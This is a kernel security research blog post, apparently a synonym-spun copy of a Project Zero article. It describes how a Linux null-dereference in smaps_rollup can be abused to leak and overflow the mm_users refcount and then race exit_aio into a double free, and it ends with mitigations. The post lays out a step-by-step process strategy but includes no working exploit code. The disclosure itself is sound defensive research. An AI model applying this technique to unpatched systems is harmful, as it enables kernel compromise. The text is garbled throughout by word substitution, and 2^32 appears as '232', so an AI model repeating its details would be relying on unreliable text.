Exploiting null-dereferences within the Linux kernel
Posted by Seth Jenkins, Mission Zero
For a good period of time, null-deref bugs had been a extremely exploitable kernel bug class. Again when the kernel was capable of entry userland reminiscence with out restriction, and userland applications had been nonetheless capable of map the zero web page, there have been many straightforward methods for exploiting null-deref bugs. Nevertheless with the introduction of contemporary exploit mitigations equivalent to SMEP and SMAP, in addition to mmap_min_addr stopping unprivileged applications from mmap’ing low addresses, null-deref bugs are usually not thought of a safety problem in trendy kernel variations. This weblog publish offers an exploit method demonstrating that treating these bugs as universally innocuous typically results in defective evaluations of their relevance to safety.
Kernel oops overview
At current, when the Linux kernel triggers a null-deref from inside a course of context, it generates an oops, which is distinct from a kernel panic. A panic happens when the kernel determines that there isn’t any protected approach to proceed execution, and that subsequently all execution should stop. Nevertheless, the kernel does not cease all execution throughout an oops – as a substitute the kernel tries to get well as finest as it may well and proceed execution. Within the case of a activity, that includes throwing out the prevailing kernel stack and going on to make_task_dead which calls do_exit. The kernel will even publish in dmesg a “crash” log and kernel backtrace depicting what state the kernel was in when the oops occurred. This will likely look like an odd option to make when reminiscence corruption has clearly occurred – nevertheless the intention is to permit kernel bugs to extra simply be detectable and loggable beneath the philosophy that a working system is much easier to debug than a dead one.
The unlucky facet impact of the oops restoration path is that the kernel just isn’t capable of carry out any related cleanup that it will usually carry out on a typical syscall error restoration path. Which means any locks that had been locked in the mean time of the oops keep locked, any refcounts stay taken, any reminiscence in any other case quickly allotted stays allotted, and so on. Nevertheless, the method that generated the oops, its related kernel stack, activity struct and spinoff members and so on. can and sometimes shall be freed, which means that relying on the exact circumstances of the oops, it’s potential that no reminiscence is definitely leaked. This turns into significantly essential with regard to exploitation later.
Reference rely mismanagement overview
Refcount mismanagement is a reasonably well-known and exploitable problem. Within the case the place software program improperly decrements a refcount, this could result in a traditional UAF primitive. The case the place software program improperly doesn’t decrement a refcount (leaking a reference) can also be typically exploitable. If the attacker may cause a refcount to be repeatedly improperly incremented, it’s potential that given sufficient effort the refcount might overflow, at which level the software program now not has any remotely wise thought of what number of refcounts are taken on an object. In such a case, it’s potential for an attacker to destroy the article by incrementing and decrementing the refcount again to zero after overflowing, whereas nonetheless holding reachable references to the related reminiscence. 32-bit refcounts are significantly susceptible to this type of overflow. It is crucial nevertheless, that every increment of the refcount allocates little or no bodily reminiscence. Even a single byte allocation is sort of costly if it have to be carried out 232 instances.
Instance null-deref bug
When a kernel oops unceremoniously ends a activity, any refcounts that the duty was holding stay held, although all reminiscence related to the duty could also be freed when the duty exits. Let’s have a look at an instance – an in any other case unrelated bug I coincidentally found within the very latest previous:
static int show_smaps_rollup(struct seq_file *m, void *v) { struct proc_maps_private *priv = m->non-public; struct mem_size_stats mss; struct mm_struct *mm; struct vm_area_struct *vma; unsigned lengthy last_vma_end = 0; int ret = 0; priv->activity = get_proc_task(priv->inode); //activity reference taken if (!priv->activity) return –ESRCH; mm = priv->mm; //With no vma’s, mm->mmap is NULL if (!mm || !mmget_not_zero(mm)) { //mm reference taken ret = –ESRCH; goto out_put_task; } memset(&mss, 0, sizeof(mss)); ret = mmap_read_lock_killable(mm); //mmap learn lock taken if (ret) goto out_put_mm; hold_task_mempolicy(priv); for (vma = priv->mm->mmap; vma; vma = vma->vm_next) { smap_gather_stats(vma, &mss); last_vma_end = vma->vm_end; } show_vma_header_prefix(m, priv->mm->mmap->vm_start,last_vma_end, 0, 0, 0, 0); //the deref of mmap causes a kernel oops right here seq_pad(m, ‘ ‘); seq_puts(m, “[rollup]n”); __show_smap(m, &mss, true); release_task_mempolicy(priv); mmap_read_unlock(mm); out_put_mm: mmput(mm); out_put_task: put_task_struct(priv->activity); priv->activity = NULL; return ret; } |
This file is meant merely to print a set of reminiscence utilization statistics for the respective course of. Regardless, this bug report reveals a traditional and in any other case innocuous null-deref bug inside this perform. Within the case of a activity that has no VMA’s mapped in any respect, the duty’s mm_struct mmap member shall be equal to NULL. Thus the priv->mm->mmap->vm_start entry causes a null dereference and consequently a kernel oops. This bug may be triggered by merely learn’ing /proc/[pid]/smaps_rollup on a activity with no VMA’s (which itself may be stably created by way of ptrace):
This kernel oops will imply that the next occasions happen:
- The related struct file may have a refcount leaked if fdget took a refcount (we’ll strive and ensure this doesn’t occur later)
- The related seq_file inside the struct file has a mutex that can without end be locked (any future reads/writes/lseeks and so on. will hold without end).
- The activity struct related to the smaps_rollup file may have a refcount leaked
- The mm_struct’s mm_users refcount related to the duty shall be leaked
- The mm_struct’s mmap lock shall be completely readlocked (any future write-lock makes an attempt will hold without end)
Every of those situations is an unintentional side-effect that results in buggy behaviors, however not all of these behaviors are helpful to an attacker. The everlasting locking of occasions 2 and 5 solely makes exploitation harder. Situation 1 is unexploitable as a result of we can’t leak the struct file refcount once more with out taking a mutex that can by no means be unlocked. Situation 3 is unexploitable as a result of a activity struct makes use of a protected saturating kernel refcount_t which prevents the overflow situation. This leaves situation 4.
The mm_users refcount nonetheless makes use of an overflow-unsafe atomic_t and since we will take a readlock an indefinite variety of instances, the related mmap_read_lock doesn’t forestall us from incrementing the refcount once more. There are a pair essential roadblocks we have to keep away from with a view to repeatedly leak this refcount:
- We can’t name this syscall from the duty with the empty vma listing itself – in different phrases, we will’t name learn from /proc/self/smaps_rollup. Such a course of can’t simply make repeated syscalls because it has no digital reminiscence mapped. We keep away from this by studying smaps_rollup from one other course of.
- We should re-open the smaps_rollup file each time as a result of any future reads we carry out on a smaps_rollup occasion we already triggered the oops on will impasse on the native seq_file mutex lock which is locked without end. We additionally must destroy the ensuing struct file (by way of shut) after we generate the oops with a view to forestall untenable reminiscence utilization.
- If we entry the mm by means of the identical pid each time, we’ll run into the activity struct max refcount earlier than we overflow the mm_users refcount. Thus we have to create two separate duties that share the identical mm and stability the oopses we generate throughout each duties so the duty refcounts develop half as rapidly because the mm_users refcount. We do that by way of the clone flag CLONE_VM
- We should keep away from opening/studying the smaps_rollup file from a activity that has a shared file descriptor desk, as in any other case a refcount shall be leaked on the struct file itself. This isn’t tough, simply don’t learn the file from a multi-threaded course of.
Our ultimate refcount leaking overflow technique is as follows:
- Course of A forks a course of B
- Course of B points PTRACE_TRACEME in order that when it segfaults upon return from munmap it gained’t go away (however somewhat will enter tracing cease)
- Proces B clones with CLONE_VM | CLONE_PTRACE one other course of C
- Course of B munmap’s its whole digital reminiscence handle area – this additionally unmaps course of C’s digital reminiscence handle area.
- Course of A forks new youngsters D and E which is able to entry (B|C)’s smaps_rollup file respectively
- (D|E) opens (B|C)’s smaps_rollup file and performs a learn which is able to oops, inflicting (D|E) to die. mm_users shall be refcount leaked/incremented as soon as per oops
- Course of A goes again to step 5 ~232 instances
The above technique may be rearchitected to run in parallel (throughout processes not threads, due to roadblock 4) and enhance efficiency. On server setups that print kernel logging to a serial console, producing 232 kernel oopses takes over 2 years. Nevertheless on a vanilla Kali Linux field utilizing a graphical interface, a demonstrative proof-of-concept takes solely about 8 days to finish! On the completion of execution, the mm_users refcount may have overflowed and be set to zero, although this mm is at present in use by a number of processes and may nonetheless be referenced by way of the proc filesystem.
Exploitation
As soon as the mm_users refcount has been set to zero, triggering undefined habits and reminiscence corruption ought to be pretty straightforward. By triggering an mmget and an mmput (which we will very simply do by opening the smaps_rollup file as soon as extra) we should always be capable to free your entire mm and trigger a UAF situation:
static inline void __mmput(struct mm_struct *mm) { VM_BUG_ON(atomic_read(&mm->mm_users)); uprobe_clear_state(mm); exit_aio(mm); ksm_exit(mm); khugepaged_exit(mm); exit_mmap(mm); mm_put_huge_zero_page(mm); set_mm_exe_file(mm, NULL); if (!list_empty(&mm->mmlist)) { spin_lock(&mmlist_lock); list_del(&mm->mmlist); spin_unlock(&mmlist_lock); } if (mm->binfmt) module_put(mm->binfmt->module); lru_gen_del_mm(mm); mmdrop(mm); } |
Sadly, since 64591e8605 (“mm: defend free_pgtables with mmap_lock write lock in exit_mmap”), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm’s mmap_lock is completely readlocked many instances, any calls to __mmput will manifest as a everlasting impasse inside exit_mmap.
Nevertheless, earlier than the decision completely deadlocks, it’s going to name a number of different features:
- uprobe_clear_state
- exit_aio
- ksm_exit
- khugepaged_exit
Moreover, we will name __mmput on this mm from a number of duties concurrently by having every of them set off an mmget/mmput on the mm, producing irregular race situations. Below regular execution, it shouldn’t be potential to set off a number of __mmput’s on the identical mm (a lot much less concurrent ones) as __mmput ought to solely be known as on the final and solely refcount decrement which units the refcount to zero. Nevertheless, after the refcount overflow, all mmget/mmput’s on the still-referenced mm will set off an __mmput. It is because every mmput that decrements the refcount to zero (regardless of the corresponding mmget being why the refcount was above zero within the first place) believes that it’s solely answerable for releasing the related mm.
This racy __mmput primitive extends to its callees as effectively. exit_aio is an efficient candidate for making the most of this:
void exit_aio(struct mm_struct *mm) { struct kioctx_table *desk = rcu_dereference_raw(mm->ioctx_table); struct ctx_rq_wait wait; int i, skipped; if (!desk) return; atomic_set(&wait.rely, desk->nr); init_completion(&wait.comp); skipped = 0; for (i = 0; i < desk->nr; ++i) { struct kioctx *ctx = rcu_dereference_protected(desk->desk[i], true); if (!ctx) { skipped++; proceed; } ctx->mmap_size = 0; kill_ioctx(mm, ctx, &wait); } if (!atomic_sub_and_test(skipped, &wait.rely)) { /* Wait till all IO for the context are achieved. */ wait_for_completion(&wait.comp); } RCU_INIT_POINTER(mm->ioctx_table, NULL); kfree(desk); } |
Whereas the callee perform kill_ioctx is written in such a approach to forestall concurrent execution from inflicting reminiscence corruption (a part of the contract of aio permits for kill_ioctx to be known as in a concurrent approach), exit_aio itself makes no such ensures. Two concurrent calls of exit_aio on the identical mm struct can consequently induce a double freed from the mm->ioctx_table object, which is fetched firstly of the perform, whereas solely being freed on the very finish. This race window may be widened considerably by creating many aio contexts with a view to decelerate exit_aio’s inside context releasing loop. Profitable exploitation will set off the next kernel BUG indicating {that a} double free has occurred:
Be aware that as this exit_aio path is hit from __mmput, triggering this race will produce no less than two completely deadlocked processes when these processes later attempt to take the mmap write lock. Nevertheless, from an exploitation perspective, that is irrelevant because the reminiscence corruption primitive has already occurred earlier than the impasse happens. Exploiting the resultant primitive would in all probability contain racing a reclaiming allocation in between the 2 frees of the mm->ioctx_table object, then making the most of the ensuing UAF situation of the reclaimed allocation. It’s undoubtedly potential, though I didn’t take this all the best way to a accomplished PoC.
Conclusion
Whereas the null-dereference bug itself was fixed in October 2022, the extra essential repair was the introduction of an oops limit which causes the kernel to panic if too many oopses happen. Whereas this patch is already upstream, it’s essential that distributed kernels additionally inherit this oops restrict and backport it to LTS releases if we need to keep away from treating such null-dereference bugs as full-fledged safety points sooner or later. Even in that best-case situation, it’s nonetheless extremely useful for safety researchers to fastidiously consider the side-effects of bugs found sooner or later which are equally “innocent” and be certain that the abrupt halt of kernel code execution brought on by a kernel oops doesn’t result in different security-relevant primitives.